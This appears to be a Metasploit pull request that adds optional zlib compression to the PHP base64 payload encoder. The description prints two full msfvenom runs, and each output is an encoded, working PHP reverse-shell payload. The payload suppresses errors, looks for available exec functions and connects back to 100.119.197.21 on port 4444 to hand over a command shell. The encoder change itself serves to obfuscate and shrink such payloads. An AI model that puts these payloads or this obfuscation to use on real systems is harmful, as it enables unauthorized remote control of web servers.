### PR TITLE
Add the possibility the compress the payload in encoders/php/base64

### DIFF
--- a/modules/encoders/php/base64.rb
+++ b/modules/encoders/php/base64.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Encoder
       'Arch' => ARCH_PHP)
     register_options(
       [
-        OptString.new('Compress', [ false, 'Compress the payload with zlib' ])
+        OptBool.new('Compress', [ true, 'Compress the payload with zlib', false ]) # Disabled by default as it relies on having php compiled with zlib, which might not be available on come exotic setups.
       ],
       self.class)
   end

--- a/modules/encoders/php/base64.rb
+++ b/modules/encoders/php/base64.rb
@@ -17,6 +17,11 @@ class MetasploitModule < Msf::Encoder
       'Author' => 'egypt',
       'License' => BSD_LICENSE,
       'Arch' => ARCH_PHP)
+    register_options(
+      [
+        OptString.new('Compress', [ false, 'Compress the payload with zlib' ])
+      ],
+      self.class)
   end
 
   def encode_block(state, buf)
@@ -26,12 +31,22 @@ class MetasploitModule < Msf::Encoder
       raise BadcharError if state.badchars.include?(c)
     end
 
+    if datastore['Compress']
+      %w[g z u n c o m p r e s s].uniq.each do |c|
+        raise BadcharError if state.badchars.include?(c)
+      end
+    end
+
     # Modern versions of PHP choke on unquoted literal strings.
     quote = "'"
     if state.badchars.include?("'")
       raise BadcharError.new, "The #{self.name} encoder failed to encode the decoder stub without bad characters." if state.badchars.include?('"')
 
       quote = '"'
+    end
+
+    if datastore['Compress']
+      buf = Zlib::Deflate.deflate(buf)
     end
 
     # PHP escapes quotes by default with magic_quotes_gpc, so we use some
@@ -98,6 +113,10 @@ class MetasploitModule < Msf::Encoder
     # cause a syntax error.  Remove any trailing dots.
     b64.chomp!('.')
 
-    return 'eval(base64_decode(' + quote + b64 + quote + '));'
+    if datastore['Compress']
+      return 'eval(gzuncompress(base64_decode(' + quote + b64 + quote + ')));'
+    else
+      return 'eval(base64_decode(' + quote + b64 + quote + '));'
+    end
   end
 end


### PR DESCRIPTION
Without compression:

```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4040 (iteration=0)
php/base64 chosen with final size 4040
Payload size: 4040 bytes
eval(base64_decode('ICAgIC8qPD9waHAgLyoqLwogICAgICBAZXJyb3JfcmVwb3J0aW5nKDApO0BzZXRfdGltZV9saW1pdCgwKTtAaWdub3JlX3VzZXJfYWJvcnQoMSk7QGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7CiAgICAgICRkaXM9QGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CiAgICAgIGlmKCFlbXB0eSgkZGlzKSl7CiAgICAgICAgJGRpcz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCcsJywkZGlzKTsKICAgICAgICAkZGlzPWV4cGxvZGUoJywnLCRkaXMpOwogICAgICAgICRkaXM9YXJyYXlfbWFwKCd0cmltJywkZGlzKTsKICAgICAgfWVsc2V7CiAgICAgICAgJGRpcz1hcnJheSgpOwogICAgICB9CiAgICAgIAogICAgJGlwYWRkcj0nMTAwLjExOS4xOTcuMjEnOwogICAgJHBvcnQ9NDQ0NDsKCiAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdlbXJvckVjdFlWZWYnKSl7CiAgICAgIGZ1bmN0aW9uIGVtcm9yRWN0WVZlZigkYyl7CiAgICAgICAgZ2xvYmFsICRkaXM7CiAgICAgICAgCiAgICAgIGlmIChGQUxTRSAhPT0gc3RyaXN0cihQSFBfT1MsICd3aW4nICkpIHsKICAgICAgICAkYz0kYy4iIDI.chr(43).JjFcbiI7CiAgICAgIH0KICAgICAgJER5Rk89J2lzX2NhbGxhYmxlJzsKICAgICAgJGVrTXV5WkY9J2luX2FycmF5JzsKICAgICAgCiAgICAgIGlmKCREeUZPKCdwb3BlbicpJiYhJGVrTXV5.WkYoJ3BvcGVuJywkZGlzKSl7CiAgICAgICAgJGZwPXBvcGVuKCRjLCdyJyk7CiAgICAgICAgJG89TlVMTDsKICAgICAgICBpZihpc19yZXNvdXJjZSgkZnApKXsKICAgICAgICAgIHdoaWxlKCFmZW9mKCRmcCkpewogICAgICAgICAgICAkby49ZnJlYWQoJGZwLDEwMjQpOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAcGNsb3NlKCRmcCk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdzaGVsbF9leGVjJykmJiEkZWtNdXlaRignc2hlbGxfZXhlYycsJGRpcykpewogICAgICAgICRvPWAkY2A7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdwcm9jX29wZW4nKSYmISRla011eVpGKCdwcm9jX29wZW4nLCRkaXMpKXsKICAgICAgICAkaGFuZGxlPXByb2Nfb3BlbigkYyxhcnJheShhcnJheSgncGlwZScsJ3InKSxhcnJheSgncGlwZScsJ3cnKSxhcnJheSgncGlwZScsJ3cnKSksJHBpcGVzKTsKICAgICAgICAkbz1OVUxMOwogICAgICAgIHdoaWxlKCFmZW9mKCRwaXBlc1sxXSkpewogICAgICAgICAgJG8uPWZyZWFkKCRwaXBlc1sxXSwxMDI0KTsKICAgICAgICB9CiAgICAgICAgQHByb2NfY2xvc2UoJGhhbmRsZSk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdleGVjJykmJiEkZWtNdXlaRignZXhlYycsJGRpcykpewogICAgICAgICRvPWFycmF5KCk7CiAgICAgICA.gZXhlYygkYywkbyk7CiAgICAgICAgJG89am9pbihjaHIoMTApLCRvKS5jaHIoMTApOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygnc3lzdGVtJykmJiEkZWtNdXlaRignc3lzdGVtJywkZGlzKSl7CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBzeXN0ZW0oJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygncGFzc3RocnUnKSYmISRla011eVpGKCdwYXNzdGhydScsJGRpcykpewogICAgICAgIG9iX3N0YXJ0KCk7CiAgICAgICAgcGFzc3RocnUoJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICB7CiAgICAgICAgJG89MDsKICAgICAgfQogICAgCiAgICAgICAgcmV0dXJuICRvOwogICAgICB9CiAgICB9CiAgICAkbm9mdW5jcz0nbm8gZXhlYyBmdW5jdGlvbnMnOwogICAgaWYoaXNfY2FsbGFibGUoJ2Zzb2Nrb3BlbicpYW5kIWluX2FycmF5KCdmc29ja29wZW4nLCRkaXMpKXsKICAgICAgJHM9QGZzb2Nrb3BlbigidGNwOi8vMTAwLjExOS4xOTcuMjEiLCRwb3J0KTsKICAgICAgd2hpbGUoJGM9ZnJlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJG.MsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1aXQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgZndyaXRlKCRzLCRub2Z1bmNzKTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGZ3cml0ZSgkcywkb3V0KTsKICAgICAgfQogICAgICBmY2xvc2UoJHMpOwogICAgfWVsc2V7CiAgICAgICRzPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7CiAgICAgIEBzb2NrZXRfY29ubmVjdCgkcywkaXBhZGRyLCRwb3J0KTsKICAgICAgQHNvY2tldF93cml0ZSgkcywic29ja2V0X2NyZWF0ZSIpOwogICAgICB3aGlsZSgkYz1Ac29ja2V0X3JlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1a.XQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgQHNvY2tldF93cml0ZSgkcywkbm9mdW5jcyk7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAc29ja2V0X3dyaXRlKCRzLCRvdXQsc3RybGVuKCRvdXQpKTsKICAgICAgfQogICAgICBAc29ja2V0X2Nsb3NlKCRzKTsKICAgIH0K'));
$
```

With compression:

```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1617 (iteration=0)
php/base64 chosen with final size 1617
Payload size: 1617 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ.chr(47).p5fQRtCSGWabaUGts7jlqBIsaFZE8zZh64rWJk6xWxlUiUpxEbb.chr(47).z5QbxYtdykw7NtswLLvnjvdPffoaIQQmp79.chr(43).HOxLtD07Gx6gqrXBWitNNNQKG2FvCezcHFhwDIrNsBysRG2Mol7qTSw0oBmyUppS2JnlYIZsARvki2DLfDSCiWrWBzNwkVzkyAVhlbgewdOhUlWObCslNzhDe6QIiMj2BR2R1xMGH5s7E2OQsO9qzVPOBA8fR2hN99MceTeFX7hw2Fb5CoF8iV.chr(47).onWyY5ukINhqsTkAfYbcwMcjEWQPaa7VJRBFkqaa4ng2m8Tx00n89LvJeYxrcOAIpvP5fL44OWlbbRlgsBXGGoJ3Lwp79QHvG28RqPaQgPc4uc.chr(47).VKsmryvaddUwi8vzyenmFRpQiY7UwVpPbX27ZzTJC.chr(43).EFIjMIQ9frjNOCTMTr.chr(47).6TT.chr(43).S44PWwzyd6.chr(47).ubhTFwjCe5LmbIO4G.chr(47).OftK7WjWEhWMdQ59mNt4gl2MsHh6emoDmoM0WDe6pBshBySBDwKVH.chr(43).Sir5TQhK.chr(43).1iSehc45ab57kzxSillDnrNBQT3zsbLeBvztY5kLrThTBUgv8d46zLtOZJoD7SCuz5qA.chr(43).hMXogAcYY3DyLc8HLOEUeB.chr(43).GJ.chr(43).ol39cX.chr(43).8ND2uRAxlloDJSo1.chr(47).Hb.chr(47).pFuZgJzTQk6R4QxbPzeS.chr(47).t5.chr(43).7bRVU8z5UB0vTz.chr(43).Ah2xsLGp782DShSK2Zsom1fETXWPRVen2rlNg3jSlqQ1vQj1IqBTBnPIZHk0fKKxBi71qU.chr(47).xtb4VSW26P.chr(43).wyKHQviCyrKBFKy6npH8Qh8iIMEyDUaXmQIKs8JXhiefQ6QknKw4l0xdNXz6NdLLiaMveQzjz91Pn0mBLLVGgfH.chr(47).9GUjl9qmhWKpqmaD9.EbRol3JvvxGcGcXf1.chr(47).QmMh21.chr(43).63vOGA5MPSic5Kx5cUP06l.chr(47).Ioyj6jDomqypDHhLmInOZ.chr(47).Pv.chr(47).a1TWkQRxt58TLlyOz3g0Sx6EiJKEeYpwt4k.chr(43).DoVuod8En0bh.chr(47).2nFzmGq9Oin25ep.chr(47).tQCovRp0.chr(47).oiA.chr(43).2wuL.chr(43).AYLQSkPyvpfbP0DrNmhzkPUz.chr(43).iXV4nZQSrMkN3AgrexBCwuOpnaeXvCgjONq62VRpR2c6FmjxTa314ubsRuxe3o1JBbI5XP268uru2h58.chr(43).wFW979fnX5W7S8uWZ3z2671F2IkhK4rW5d.chr(47).2U40EML7CocezcbD4XTRvyvn6.chr(47).Qz4DefyOjYTJV2shYnbst65Q1kFangwOFnfwNAM8OCw')));
$
```

Let's not enable it by default as it relies on having php compiled with zlib by default, which might not be available on come exotic setups.

You might want to land #19376 first before testing this one, as it's broken without it.